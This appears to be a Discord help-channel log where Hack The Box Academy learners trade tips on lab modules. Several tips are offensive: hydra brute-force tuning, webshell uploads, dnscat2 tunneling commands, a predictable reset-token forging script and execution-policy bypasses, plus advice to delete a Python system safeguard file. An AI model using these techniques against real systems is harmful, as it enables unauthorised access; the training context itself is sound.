#modules
no
i suggest throwing cat << 'EOF' > rce.php into explainshell
because it's using bash redirects
it's showing (a very poor way) to write code to a file
instead of using vim/vi/nano
cat (when not given a parameter) will read from stdin
the cat << 'EOF' tells cat to read from stdin until you tell it EOF (End Of File)
the actual php code is above the shell section
Redirections (Bash Reference Manual)
thank you very much!
i hope HTB gives you kick backs for each help request you solve for their customers lol
nope
i help because i'm selfish, it helps me retain the information by teaching it to others
In the CDSA modules, the WINDOWS EVENT LOGS & FINDING EVIL for Windows Event Logs, for the question
Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe
How does an incident responder/participant know to search for Event ID 4907 after examining the Event ID 4624? I only solved it because the module gave it away. However, I want to know why they searched that event ID in the first place, what led them to it?
perform a similar investigation
an IR knows what they're doing
so they are teaching you the way an IR would do it
investigate logon events -> investigate events related to LogOnIDs
specifically it was narrowed down that files/data was accessed/changed on that date at that timestamp
i.e. normally it wouldn't be from years ago
rather from like last week. where your EDR system would have alerted you
EDR says "hey uh, this shit is not right" and sends that info to the SOC team
SOC team then does an investigation re: logon events, to dig for info
then further digging into events that could be related
i believe that section even gives you a decent list of the different (common) Event IDs
For example?
So a suspicious logon was alerted by the EDR, so an IR/SOC member investigates the event. They decide to check if any changes were made during the time of the suspicious login, by examining 4907 they can see any SACL changes. They discover the suspicious executable and report it. Is that pretty much a scenario they are preparing us for?
Question asks for auditing settings
pretty much
ahhhhh
see what registry and ACL changes were made
"provide the name of the executable responsible for the modification of the auditing settings as your answer"
Is the .* operator a grep operator, or a linux command line operator?
For instance, the command grep | 'abc.*ghi' should output def
But when I look at the grep man page, it shows * as matching anything preceding, and the . is nowhere to be found in their command structure
and if you weren't sure "Event ID for changing auditing settings" and you're bound to either find the MS learn page on it or some blog about it
it's regex
if you wrap it in backticks it'll show properly
Thank you! I wanted to understand the thought process behind the answer. You did an excellent job explaining it to a noobie like myself lol
What is regex?
So is regex a grep process?
no
Or part of bash?
Regular Expressions are a broad category of things that assist with searching, and allow more precise/nuanced things and allows matching certain things
hello everyone
I'm trying to break down some of these newer commands to understand them without just blindly copy/pasting them
Someone else with target issues?
so you can do something like "\sA\s" and it will only match the letter A with no characters next to it
a lot of times the default grep is actually aliased to egrep
which is regex default
i am doing starting point and cannot find pwnbox?
usually -E is for extended RegEx stuff
I can't connect it and my internet is ok. Reset the target doesn't work.
wrong channel; read and follow #welcome to access #starting-point
message support
already do it but take a while xd
i have tried am trying, and really want to do HTB , but getting to help discussions has led me to a 2 hour dead en
anyway, gonna wait. thanks
again this channel isn't for starting-point
well it's friday and they don't have enough staff to work support chat 24/7 so it's limited availability
i know, im gonna take a chill. Thanks again for the response.
check always if the vpn is connected xd
"issue" resolved 🤡
I've been seeing a fair bit recently that some people are having their vpn "randomly" disconnect. How much of it is them not being connected in the first place - who knows.
I've done the cat command for the flag on the File Inclusion skills assessment over 10 times and still no flag!
Anyone have issues with it showing up?
I checked my command against the walkthrough and it's fine.
I can quite literally see at least 10 GET requests in there but no flag!
It just says
HTTP/1.1" 200 3253 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
After the request
That is not the flag
I'm assuming that 200 means the request was good?
I even cURLed for it and it's the same thing
Just a wall of GET requests
200 just means "OK" in status code language
This looks like the user agent header or something
i found out that running EU academy -1 is borderline impossible for me, even on ssh i have an input delay of up to 4s, switched to EU2 and barely any lag
Yeah, was just not giving me the flag, I already poisoned the header in the previous step. This one's annoying, it ended up being a random string of text randomly buried in the log. It wasn't even near the command I used.
Yeah that happens
Good thing there's a walkthrough otherwise I would not have known I was just supposed to try random stuff from the output as a flag, lol
I think that's the best thing HTB Academy has done lately, even though the walkthroughs are sparse I at least know I'm not going crazy if stuff isn't working.
Is there something I'm missing in terms of where the flag should have been?
I used cURL with the same result
I had the flag, just didn't know that it was the flag until I actually checked the walkthrough.
It wasn't in the HTB{} format
Likely reading the question will help you derive the answer
Sometimes answers aren't flags like the answers related to SID and such in AD modules
The question asked for a root flag in / and I found the file, performed the inclusion, but it just didn't appear with the 10+ times I did the command, only showed up once buried further back in the log file
Also not sure why it only showed up once when I did the command many times in order to see the pattern I was missing in the log
I'm wondering if this is intended functionality or a bug on the log output?
i was able to use ls to list all the directory contents and saw it in there the very first time. you're saying you saw the directory contents but the flag wasn't there, and then it appeared there after you trying 10+ times?
is this normal?
can someone help me remember the name of that reporting tool that HTB recommends?
sysreptor?
i have a question from the DNS segment in the footprinting module. regarding the FQDN's i feel like i have the answer and maybe im just submitting the answers incorrectly is there someone to ask and get a second look?
sure
i cant post the screen shots in here may i dm you?
yeah
Don't include the trailing .
Yeah in the dms with supernuts i found that was my issue the extra .
Yeah it's like "wait... I didn't try that?"
It's been doing that a bit lately for me
Refreshing the page then waiting a minute or two works for me
mmm
In "Attacking Common Services - Medium", are the FTP services supposed to be barely functional?
dir
500 DIR not understood
ls
500 LS not understood
help
214-The following commands are recognized (* =>'s unimplemented):
CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV
EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD
XRMD MKD XMKD PWD XPWD SIZE SYST HELP
NOOP FEAT OPTS HOST CLNT AUTH* CCC* CONF*
ENC* MIC* PBSZ* PROT* TYPE STRU MODE RETR
STOR STOU APPE REST ABOR USER PASS ACCT*
REIN* LIST NLST STAT SITE MLSD MLST
Yeah I can't get one to work. Just using my VM instead via VPN
i see, okay.
they worked fine for me
are you connected via telnet?
if so: don't
there's literally the command : ftp to connect
ftp <server> <port>{21 implied if port is not specified}
if ftp isn't installed; sudo apt install ftp
No.. i was using ftp
checks oops yeah i was using telnet
:/
now that i've reset the target a few times, the extra services aren't coming up
Yep that was it, thanks @fathom pendant.
this skill assessment is notorious for those services not showing up properly
i can't believe i was using telnet 🫢
telnet is fine for grabbing banners
but tools like ftp have built in wrapper commands
i believe the similar command would have been LIST but i'm not sure
Getting same error for past half hour
change pwnbox regions
Didn’t work
It’s been like this for the past 4 hours
well support is gonna be the way to get help
I can vouch for this
Can I ask would anyone recommend a raspberry pi to practice pen testing or learning basic/intermediate python coding?
A raspi would not be good for pentesting
for coding stuff; sure
but a LOT of pentesting tools and such require a lot more processing overhead that a raspi just can't do
no
Opposite, defensive
not sure
also this channel really isn't for discussion on that topic
read and follow #welcome and you can access more of the server
Oh, Im sorry
you'll need an account at https://app.hackthebox.com to do the verification
I thought I clicked off topic general
you can't access it since your account isn't linked
or at the very least you can read, but not type there
Hi
Hi
I need help for the linux fundamentals
the question is " What is the path to the htb-student's mail? " and I found the path but the answer is still wrong ?
not sure how I can upload photos on here as well. I'm quite new so I don't know how to navigate this discord.
Me too… I don’t see how they expect us to figure this stuff out with the given material.
the path is "/var/spool/mail/htb-student" but it says it's incorrect ?
im so confused
How the heck am I supposed to figure this out?
I couldn’t even find an answer on google.
so there is no spool in the answer apparently
how do you upload pics ? I can't upload any O.o
You have to register your HTB account on discord… I forgot how.
What section is that?
intro to linux
Which subsection?
System info 3rd question
/var/mail/htb-student
I don’t know how I feel about HTB Academy… 🫤
I was on Try Hack Me and it was more simple. HTB is more tough
It doesn’t seem like the material is enough to figure out the answers.
I have to google almost every answer, and sometimes still can’t find it.
had to look up a command and as you can see there is /var/SPOOL/mail/htb-student
yet the answer was wrong and you don't include spool in the answer apparently
I didn’t use that command. I forgot how I figured that one out.
had to look it up for me. Since there was no mention on how to look it up @_@
They show you in the material but it was still not quite right…
I had to change it a little bit.
Which shell is specified for the htb-student user?
the next question and I have no clue where to look besides google the answer T_T
I think I had to google that.
Pretty easy to find tho.
echo $SHELL iirc should get you the answer
it should also be in env
environment variables tend to be in all caps
so you can usually get away with env | grep SHELL
I read the whole linux pages so far and it never showed any of those commands T_T
I had to look up how to and answers unfortunately
I'll push through with learning from HTB for now and see how it goes
it's in like one of the first interactive sections they give you a whole list of commands
env (when run without args) just prints the list of environment variables
password attacks is by far the worst modules I have ever done
I think that’s a fair assessment
I see, google will guide me I guess. Wouldn't even have known what that fully means
having to wait HOURS before getting your passwords is driving me insane
Im having a similar issue.
When I connect through openvpn, it seems very buggy.
It actually freezes with certain commands and actions.
sounds like someone didn't adjust their threads
also don't attack ssh ¯_(ツ)_/¯
like the 2 main rules of that module: ssh is a last resort
-t 48 is king
the longest i've had to wait has been ~30 minutes
ftp is better
but not hours
I would rather do mist all over again than doing password attacks
¯_(ツ)_/¯
i'm just providing general advice
with hydra adding -t 48 will significantly speed up the process
what is your command?
Any clues on how to filter unique paths?
ftp or smb for the linux box
Anyone has issue running the validation logic disparity docker locally on your own computer? I could not seem to see any unavailableSlots ....
Take another look at the possibilities of grep, cut, tr and sort
Well, I googled it (like most questions) and I found the answer.
But at this point I would not have the know how or intuition to have figured that out.
I’m not feeling too confident…
I can only imagine how the certification test are.
The module explains each of these tools. Play around with them and use them in all kinds of situations.
I feel you’d pretty much have to have mastered grep, cut, tr and sort already.
The module does explain, true.
But these quiz questions require practical mastery.
I always have to look up how this or that works.
But the more you play around with it, the better you get at using these tools
You won't learn a single tool by reading about it in a module.
Use these tools. Play with them. Try to find ways. And then, when you know things a little, try to solve the tasks.
Go step by step.
First of all, you need the complete HTML code.
Then filter more and more until you get to the result
Technically, the command I used with just grep, cut, tr and sort gives the wrong answer.
It gives 33
The longer list of commands I found that give the correct answer used a tool that was not covered. The “uniq” tool. Which gave 34
Is there a module that teaches you how identify websites with malicious intent?
I don't know what you ran, but with sort -u you can do exactly that
Hey, I'm a bit confused as to what they want here as there was no mention of the word "index" through the module at all and when I did the command ls -la | grep -n sudoers to get the line number of sudoers that still did not work
I feel like I'm gonna feel dumb when I find the solution but Idk what do they mean by "index"
But that gives 33
Ok, I should not be quick to send here questions cause every time I ask here I end up solving it myself like 1 minute later lol but tbf the section did not cover anything about the "index numbers"
You're not really filtering here.
You're just looking for a URL pattern. But the pattern can be different 😉
Have a look at your list.
So as not to spoil anything, I've deleted your post
The only other method I found used the “uniq” tool, and multiple iterations of sort and cut of the stdout file created from the source code.
And also a “—insecure” tool, which of course I also hadn’t heard of.
Exactly, you were just looking for a command, but you didn't work it out yourself. Honestly, you'll never learn these tools properly that way
ftp usually works
-insecure looks like an argument and not a tool
I know.
That’s what I’m saying.
I don’t feel these modules really teach you to learn the tools fully.
I’ll likely take a complete Linux administration course.
I wouldn’t know where to start with most of these questions
because that's not how you get the index number
Right, which I wouldn’t know.
take a look at ls --help or man ls to see what option can be used with ls to perhaps give index info
You can only learn such tools with a little explanation (which takes place in the module) and then an environment in which you can use these tools in practice. Both are included in the module.
But you have to use it yourself
Have a look at the help pages of the tool. This was also explained in the module
Hm… I feel maybe there should be more exercises that slowly build you up. Idk.
I feel like these quizzes just toss you in the deep end.
I’ll try to read the help pages more,
Yeah I eventually found it, but the odd thing was that this question was not in the section of the ls it was in the section of "creating files and directories" so it was not immediately obvious that I was supposed to find some arguments in ls but yeah
As I've said before, you only learn if you use the tools, play around with them, try things out.
creating or managing?
also fwiw knowing a file's index number doesn't generally help much
Creating
all that was discussed in the section was like touch and mkdir
¯_(ツ)_/¯
ohhh
yeah there's a whole list of commands in one of the sections
that's just to tell you that most if not all of the commands listed are used in some capacity throughout the module
not that that list is exclusive to that section
Where can ask about this
I'm still studying in a university
But I'm sure that it not in the list of in university of HTB,I had university email too
you can try changing your email in settings to your university email
if your uni is in their list, then you get access to the sub: otherwise you gotta message support
if you hover over the text for it it tells you to do so :)
https://academy.hackthebox.com/settings -> email section: input your student email then retype email in the confirm section
There's something I'm afraid of too
Because of my country, I'm afraid that I may get blocked with some kind of content
I did it
It in the list

some other brave soul suffered through the waitlist for you (if it wasn't already there)
For some reason
I felt like the fact that it in the list is a bad things too,just my feeling
?
It's not always a bad thing to be on a list
it just means someone that went to your same school either had to put in the request for the uni to be added or it was already there
i'd prefer my uni to be on HTB's List
it's a very nice list; it helps save money
Maybe I just felt bad because Ik I'm not the first
Btw about billing,it accept anything?
Well, the Academy has been around for a few years now. The chances of being the first here are pretty slim 😉
Yeah,it very supportive for students
Yeah,I already know this like 4-5 years ago
So I created an account and joined this server at a time
I just consent enough to do this now
So basically my old self is time capsule this for me
petition to turn on ssh on windows machines, im sick of this rdp lag
i just avoid modules just for this rdp nonsense
i've generally had little issues, and when i did have issues - it was due to my vpn server being dumb
suggestion: use the tcp download; switch vpn regions
no the fps lag is like if i do some change it reflects after 10 seconds
again; sounds like a connection thing -- which is usually resolved by doing what i suggested
but ssh is fine though
because ssh isn't as resource intensive, relatively speaking, than rdp
it's not having to send over packets relating to X11 (visual)data
it's just terminal output being sent back
yea why cant they just turn on ssh on windows machines then
because often you need to interact with visual elements of windows
¯_(ツ)_/¯

submit it to /feedback since you're so up in a knot about it
windows targets i've RDPd into recently have all been behaving just fine
tcp vpn be like:
can anyone help me with the skill assessment section of intro to assembly language module
¯_(ツ)_/¯
im stuck at this question
Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.
ok what is the problem you facing
Anyone got updates on the pwnboxes not spawning?
did you get the assembly code
yea i have it
how can i get the decoded shellcode
xor it in a loop
yeah the question kinda tells you what to do to decode it
done that
which register, may i ask
yep
dm
curl -X POST -d '{"search":"flag"}' -b "PHPSESSID=h2u7hte22t03983b7p4o5dqh16" -H "Content-Type: application/json" "http://94.237.49.166:31021/search.php"
Received content contained invalid JSON!
pls help using cmd, windows
Which module and section is this?
try with burpsuite maybe, terminal is hard to handle with json
I'll like a solution and reason why this isnt working btw... Yeah CMD is tough to handle especially with quotes and all
i mean you can try escaping the quotes with \
so
{\"key\":\"value\"}
or if you analyze the source is it {"key":value}
without quotes
also i just ran this, and it worked fine on my end from a linux terminal at least
try putting the data in doublequotes instead as well with the escaping
so "{\"key\":\"value\"}"
finally
It worked, thanks so much
don't thank me thank user1683523 on stack overflow
ofc the other alternative would be putting the json data into a file and calling it with @ @json.file
xD
that's a great module
Hello, I have issues installing Crackmapexec on my local pwnbox vm
use netexec
sudo apt install crackmapexec
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
crackmapexec : Depends: python3-neo4j but it is not installable
E: Unable to correct problems, you have held broken packages.
pipx install netexec
crackmapexec is no longer being maintained, the devs have forked off to netexec
very stupid issue but
sudo pip3 install pipx
error: externally-managed-environment
× This environment is externally managed
╰─> To install Python packages system-wide, try apt install
python3-xyz, where xyz is the package you are trying to
install.
If you wish to install a non-Debian-packaged Python package,
create a virtual environment using python3 -m venv path/to/venv.
Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
sure you have python3-full installed.
If you wish to install a non-Debian packaged Python application,
it may be easiest to use pipx install xyz, which will manage a
virtual environment for you. Make sure you have pipx installed.
See /usr/share/doc/python3.11/README.venv for more information.
note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this, at the risk of breaking your Python installation or OS, by passing --break-system-packages.
hint: See PEP 668 for the detailed specification.
no such thing as local pwnbox btw, it's just parrotOS
you can either pass the --break-system-packages flag to the pip command
I meant I installed the HTB edition of the distro
yeah, still not pwnbox
sudo rm /usr/lib/python3.11/EXTERNALLY-MANAGED this also works
okay I will try user break system packages
also netexec works the same as crackmapexec
Just install nxc. Same as cme lemme link it
same syntax just with nxc/netexec instead of cme/crackmapexec
Literally what i just told them
and nxc docs say to install with pipx
great minds think alike
yeah @fathom pendant recommended it
Yea i just saw you having the issue and before scrolling fully down, i replied
okay got pipx
I am connected to VPN to solve vulnerability assessment nessus lab but I cannot open host should solve it by the way am connected VPN
There is an issue global?
awesome ensurepath works
? wdym open host
https://ip:nessusport is how you connect to the running nessus service
sudo pipx install netexec
Fatal error from pip prevented installation. Full pip output in file:
/root/.local/state/pipx/log/cmd_2024-05-04_19.17.20_pip_errors.log
Some possibly relevant errors from pip install:
ERROR: Could not find a version that satisfies the requirement netexec (from versions: none)
ERROR: No matching distribution found for netexec
Error installing netexec.
nessus uses SSL
you don't need to run pipx with sudo
ima cat this out, the error log
it gave the same error without sudo
pipx install netexec
Fatal error from pip prevented installation. Full pip output in file:
/home/apu/.local/state/pipx/log/cmd_2024-05-04_19.16.59_pip_errors.log
Some possibly relevant errors from pip install:
ERROR: Could not find a version that satisfies the requirement netexec (from versions: none)
ERROR: No matching distribution found for netexec
Error installing netexec.
Include the error log output
https://www.netexec.wiki/getting-started/installation/installation-on-unix follow these instructions
sorry i forgot they do it slightly differently
yeah just a sec
@fathom pendant Ill follow the instructions and try again
it's pipx install git+https://github.com/Pennyw0rth/NetExec
oh okay running this
Reason: Mass mention

get timed out nerd 
But yea nxc is same cme, same syntax etc
How long is the timeout?
@solid python can we save @north bramble from his honest mistake?


buahahaha
Still a month away from having the time to take the test...
I think C1oud took off for the moment
Unblock @yash - we were helping him and he put too many @s
thanks @solid python
Consider him rescued
I was thanking you all for helping me kek
Hey can anybody help me with the AD enumeration and attack module
With the password policy chapter's lab
I tried all the tools and commands and still could not get any result
What question and what have you tried?

The question was to find the password policy
but using the ip of ens22 with the command provided for linux without credentials
i couldn't get any output
also on scanning the network of ens22 i found ssh and rdp running, nothing more than these
Am I good to ask about a beginner problem here that isn't necessarily module related? I guess I could say it's a linux fundamentals filtering thing is as close as it gets.
Hi, I have a question about Pass The Ticket on Windows (Password Attacks) ; I completed the module but I have a question about the share access using ptt. Can I DM someone ? (or here but it will spoil)
i did it yesterday
you can DM me
Anyone here solved Protected Archives? I'm getting crazy, when i try to open the Notes.zip it says "Is not archive"
i downloaded it using nc and also python http.server
Not sure what you tried, you'll need to provide more detail.
If it's a simple question it wouldn't hurt to just ask
You can try SCP if you feel it was a failed transfer. On your box just use SSH creds:
scp username@remote:/file/to/send /where/to/put
What are you doing that it says not archive?
Ah, sorry I have solved that problem in particular but I figured it'd be worth knowing if I can ask in future anyways. I was trying to grep through permission denieds in some find results, got fixated on why grep doesn't work but I could just 2>/dev/null. 🙃
hey, sorry, i know this is old. i got the answer but i kinda cheated because it didn't add up. i added the 19 that i found in the first zone, but the next one had 5 records (same subdomain as the txt question). it was wrong, i got frustrated and impatient so i just incremented by 1 and hit submit till i got it. i felt bad after a bit and really would like to understand why the answer was what it was when 5+19!=[answer].
Does anyone know or have a walkthrough for this https://academy.hackthebox.com/module/17/section/60? The question is:
Use the credentials for the admin user [admin:sunshine1] and upload a webshell to your target. Once you have access to the target, obtain the contents of the 'flag.txt' file in the home directory for the 'wp-user' directory.
I've already successfully modified the 404.php file (in the Twenty Seventeen theme), but my problem is that I don't know how to upload a webshell in WordPress. I tried adding new plugins in a compressed file or adding new media with the same format (.zip, .txt, .php), but I received the same error due to security measures.
If you upgrade to an annual subscription you will get guided learning
also, don't try getting a reverse shell, but instead get code execution allowing you to read contents on the target
that's too expensive for me. Only a student here... 😦
All my Pwnbox sessions are over 100,000ms. Is this a general issue or only on my side?
Pls guys I’m stuck on unconditional branching task of intro to assembly language, here is the link to the question pls need help https://www.reddit.com/r/hackthebox/s/tRNbNjm24A
hi the servers are all filled and latency is at an all-time high I think
when will HTB Academy servers be available again?
I'm waiting to finish the last section of information gathering module
hey I am using web attacks and im trying to run this command but it says that port 80 is already in use what can I do here
you can start the webserver on any port you want
just make sure when you download it you include the port
I mean Im using it for a website in the module web attack section local file disclosure
it does not matter what port you run the server on, just make sure when calling to the url to include the correct port instead of the default port (80)
oh thanks
Hey please need help
If i buy gold or premium monthly subscription does include tier 3 and 4?
Where are prolabs-offshore channel
Read and follow #welcome and then you can access prolabs like #prolabs-dante etc
Because the second one has > 5
No one is helping me on this intro to assembly language module, pls I’m stuck at unconditional branching task
hello someone can explain this error pls for challenge https://academy.hackthebox.com/module/158/section/1436
Execution policies are preventing it from running
As it literally states in the red text
Hi i need help assembly language working on the unconditional module using jmp (unconditionals). I literally place the jmp between every line and its either exiting normally or its giving me the hex rbx value of 0x1000000 which is not correct.
ok i read it but why i've got this while as I try to reproduce what the course asks of me
Maybe running powershell as admin will make it work
You need to bypass execution policy
That too
powershell stops scripts from running unless they are digitally signed. the script you're trying to run isn't signed, so you need to bypass the execution policy to allow it to run.
mhmm okok but they don't tell you how to get around this kind of problem.
Google can
Here is the link to the question #1236401511953727529 message
Anyone here already finished Password attacks PtT Linux?
I mean the people that have the fancy swords next to their name definitely have
i need help with Login Brute Forcing : Skills Assessment/
Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?
i did everything i swear i did it with burp / curl / hydra nothing working ones i login it refresh the page and doesn't login
Did you bruteforce the user/password?
yes
i did everything
if you have the username and password, you can simply log in. you can DM me what you have, my guess is you don't have the correct credentials.
can someone help with the SECURITY MONITORING & SIEM FUNDAMENTALS htb
im confused on how im supposed to do it
where am i supposed to Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Discover".
ion see it i looked the http and nothing showed up i get an error
Did you spawn the container? It should provide you an IP to use
Okiedokie, let's see
remove the brackets
i did that too
http://10.129.250.110:5601
am i not post to put it on fire fox?
you should show the error like g0blin said then, also are you on the vpn?
no
that's your problem, you need to be on the vpn
Oh yeah.. you need to either be connected to the lab via the VPN or be working via the Pwnbox
Cool 🙂
can i run that site on my kali machine and it would work ?
as long as i have the vpn
If you switch to the OVPN connection you can work on your kali machine
That'll provide you with an OVPN config file to use
All good 🙂
is it the correct place for me to ask question about a cpts path module?
Yes
This lesson is about understanding how DNS works.
Take a closer look at this link.
https://www.cloudflare.com/learning/dns/glossary/dns-zone/
It's about finding all zones and understanding how to configure zones.
I have deleted your post so as not to spoil anything.
That link is very helpful, thanks
I tried usermod —lock , and usermod -L
I don’t know what you want from me HTB. 😪
Make sure that you do not have any spaces at the beginning or end of the string
Reload the page in the browser
It’s not working…
Though it seems to be turning my double dash into a long dash. Could this be an issue?
If you type two hyphens into the form field, does your browser turn them into a different character?
Only the option is searched for, not the entire command
When I type two hyphens it seems to be turning it into one long hyphen.
you are also asked about the option not the whole command
Try it with another browser
🙄
Got it… thanks.
i've noticed with some apps you can paste the two dashes in without them combining, if you want to try pasting them instead of typing them in.
Good morning family, is there anyone here who has gone through the intro to assembly language module? I need help in one of the sections, it's holding me
Hi, sorry i have a quick question, if someone can help me it would be cool.
I'm currently at the Broken Authentication module, section: Predictable Reset Token. I'm trying to create a script in order to generate a valid reset token but it doesn't work properly and i don't know why yet
```python
import hashlib
import sys
from datetime import datetime


def datetime_to_timestamp(datetime_str):
    # Expected input looks like "2024-05-05 10:23:25PM" (12-hour clock with AM/PM).
    fmt = "%Y-%m-%d %I:%M:%S%p"
    datetime_obj = datetime.strptime(datetime_str, fmt)
    # A naive datetime is interpreted in the local time zone by timestamp().
    # The result is converted to milliseconds since the epoch.
    timestamp = int(datetime_obj.timestamp() * 1000)
    return timestamp


def generate_reset_token(username, datetime_str):
    timestamp = datetime_to_timestamp(datetime_str)
    # Token = MD5 hex digest of the username concatenated with the timestamp.
    data = username + str(timestamp)
    token = hashlib.md5(data.encode()).hexdigest()
    return token, timestamp


if __name__ == '__main__':
    try:
        user = sys.argv[1]
        generated = sys.argv[2]
        token, ts = generate_reset_token(user, generated)
        print(f"Token: {token}, Timestamp: {ts}")
    except IndexError:
        print(f"Usage: {sys.argv[0]} <username> <datetime>")
```
Idk if maybe it's because of the milliseconds or something like that
Hi all! I'm currently working on the Linux Privilege Escalation module but the boxes for exercises are running extremely slow, disconnecting very often, impossible to work with them 😦
@next bronze thanks mate, I'll check that
Openvpn is extremely shoddy…
For some reason I thought it would perform better than the pwnbox, but it’s practically unusable…
Try to change your DNS Resolver to 1.1.1.1
PLEASE DEVS! Fix connectivity issues on Citrix Breakout Windows Privileges Esc module it is horrible! I wasted a few hours only for reconnecting over and over. Thank you.
+1
Will AI really take our jobs in Cybersecurity? 🤔🤔
Where do you work and what's your job title?
I was in web development. Currently I'm studying cybersecurity and just worried about all this AI stuff.
can anyone help me with the second question of skill assessment section in intro assembly lang module
Personally I think your worry is just wasting processing cycles and not good for your nervous system. Just focus on what you love and having a roadmap of skills acquisitions that you're working towards. Use AI to your benefit. It's also a skill you can improve upon over time.
Hey guys,
i have an issue with the "DNS Tunneling with Dnscat2" section of "pivoting and tunneling" module.
When i want to use dnscat2.ps1 on the host i rdp into, i get the following error message. Any ideas what the reason might be? On my attack host, i get a new window created, but cant interact with it. I also used powershell -ep bypass, as mentioned by others here.
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
`Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd`
Wait you use 10.10.14.18? I thought my attack host IP goes there. When i use 10.10.14.18 i get an error message
Hey guys, I'm doing the "Pivoting, Tunneling and Port Forwarding" module and I'm just reading the "Remote/Reverse Port Forwarding with SSH" lesson, and here, it uses msfvenom and then the reverse port forwarding, but would it not be possible to perform the same pivoting with dynamic port forwarding? I'm trying to understand if it would be possible and, if not, why it would not be possible. Also, because dynamic forwarding is used with socks with xfreerdp, so by using dynamic + socks could it be possible to perform a reverse shell?
Sorry if it is a stupid question, but I'm learning this topic 🙃
anyone
oh guys i got it
This is just what the module says, but it's not working for me, which is why i asked
👋 is there an issue with authenticating to the windows AD servers using htb-student:Academy_student_AD! by any chance? I've switched vpn and reset boxes multiple times and I have the same issue, wrong password. I can try to debug further, but I'm just asking before going further.
oh ok, you just have to wait a long time after the machine boots then, it's working with psexec, I said nothing!
i have an issue with the whitelisted filter section under the file upload attacks module. when i try to fuzz for allowed extensions i managed to get one, but when i try to access it in the browser i get 404 not found. why is that so? what am i doing that prevents me from accessing the shell?
edit: i've managed to find the shell path however its just the dot extension and it gives me the content inside my shell without being able to run it
is it my computer or is the **target vm for linux privilege escalation** lagging super badly (fyi I have been resetting the target vm and waiting for at least 5 mins before i ssh into it)
The windows machines just have connection issues in general, i'm struggling to get proper connections for ages, and never found a solid solution for it.
My go to advice is using pwnbox, but even then the connection dies a lot
Might be HTB traffic or ur system
How many gb of ram do you have on ur system?
Hi, who worked on the Advanced SQL Injections module?
There are questions that I cannot overcome.😔
Who can help me with them?
.
Hello. I am CPTS certified. How can I get sword icon ? 😄 #sword
No, the goal of that module is to make a route available from the second server to you. This way you can use other techniques with the tools available on your host.
but in general would it be possible to perform a reverse shell using the dynamic + socks? or could something block it?
No, the point of the module is to create a route back to you. The methods you keep suggesting create a route for you to the host but not the other way around. You can't catch a revshell with your methods.
ah okok, thanks 🙃
guys my student subscription ended yesterday i didn't know it will automatically renew i deactivated it is there a way to refund?
Reach out to support, the green bubble on the site.
Thx ;D
Reach out to support
rdp on the analyzing windows logs is a nightmare 
I'm just doing now the DNS module and I start dnscat2 using ruby and putting the attack host IP and it worked.
Which issue do you have?
But I don't know why, but after the first command, the client crashes
Hello everyone,
I'm a beginner following the HTB Academy in the learning process module. I'm having some difficulty with the question "What is the difference between the two learning progress numbers above?" I answered 36.7 using the clue 37.7 - 1.00.
Could anyone help me understand if my answer is correct or if there's something I need to fix?
link modules : https://academy.hackthebox.com/module/9/section/56
Thank you for your assistance!
The issue is on the client side. I have a screenshot above. The encryption doesn't seem to work, or it could have to do with HTB unstable connections on windows hosts.
I could read the flag anyway so it's fine, but it's always frustrating to not know if you actually made a mistake or if it's yet again a technical issue of the platform
Is the RDP to DC1 pretty unstable for the CDSA modules?
"Connect to DC1 as 'htb-student:HTB_@cademy_stdnt!' doesnt seem to like the credentials
Not done the module in question, but you may have to specify a domain for the htb-student account
So either Domain/username or username@domain
You put htb_student not htb-student
That would do it.
welll
happens to the best of us 😂
It helps us help you if you actually ask your question
i don't know what i need to do after downloading the doc.zips and decrypting
?
Obviously crack the pw for the zip file

Hi im stuck in this Question
The "C:\Rules\yara\seatbelt.yar" YARA rule aims to detect instances of the "Seatbelt.exe" .NET assembly on disk. Analyze both "C:\Rules\yara\seatbelt.yar" and "C:\Samples\YARASigma\Seatbelt.exe" and specify the appropriate string inside the "$class2" variable so that the rule successfully identifies "C:\Samples\YARASigma\Seatbelt.exe". Answer format: L________r
I have checked and was thinking i could find it in HxD but that didnt help
I tried to do grep ^L.*r$ but that doesn't work in powershell and i tried with Select-String '^L.*r$' .\Seatbelt.exe and got the answer Lr☻�☺��JR
on the line 9226 but I cant find it again without the errors help please
Ah I saw your error, I had that error when I put the wrong IP, so yeah, maybe technical issue with the platform
10.10.14.18 is their tun0 ip
file transfers module--> does the first question in linux file transfers methods make sense? the question is: Download the file flag.txt from the web root using Python from the Pwnbox. Submit the contents of the file as your answer.
So am I supposed to download the file via python code even if it is not part of the section?
I think the question is not appropriate for that section and there might be a mistake... retrieving the file via curl or wget works anyway...
Working with IDS and IPS - Suricata Rule Development 1
In the /home/htb-student directory of this section's target, there is a file called local.rules. Within this file, there is a rule with sid 2024217, which is associated with the MS17-010 exploit. Additionally, there is a PCAP file named eternalblue.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to MS17-010. What is the minimum offset value that can be set to trigger an alert?
does anyone have any idea what exactly do they mean by the minimum offset value that triggers an alert
They want you to learn different methods, maybe one day Python is the only thing you will really have available.
you didn't understand what I said. Retrieving files via python code is part of the next section
nvm I just wanted to report that the question is not appropriate for the specific section "Linux file transfers"
Hello, just a quick question. I have installed HTB's Parrot OS VM and I'm going through the login brute forcing module but the VM does not have the /opt/useful/SecLists Did I do something wrong as I thought the VM was a clone of the web pwnbox
It's a pretty close copy, but not 100% - you can find those lists here https://github.com/danielmiessler/SecLists
Thank you for the help
No worries 🙂
